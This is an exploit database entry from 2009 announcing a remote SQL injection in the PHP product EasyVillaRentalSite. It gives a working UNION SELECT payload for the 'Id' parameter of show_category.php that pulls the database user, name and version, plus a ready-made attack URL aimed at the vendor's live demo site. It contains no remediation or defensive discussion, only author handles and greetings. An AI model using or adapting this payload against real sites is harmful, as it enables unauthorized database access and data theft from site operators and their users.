EasyVillaRentalSite - 'id' SQL Injection

EDB-ID:

9094

CVE:

N/A




Platform:

PHP

Date:

2009-07-09


========================================================

==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

==> EmaiL    : wuo@hotmail.com

==> HomE    :  www.TrYaG.cc/cc

========================================================

==> Product Page :

==> http://easyvillarentalsite.com

==> ExplO!te :

==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
 
==> L!ve D3mo :

==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--

=========================================================

==> GreeTz :

==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM

=========================================================

# milw0rm.com [2009-07-09]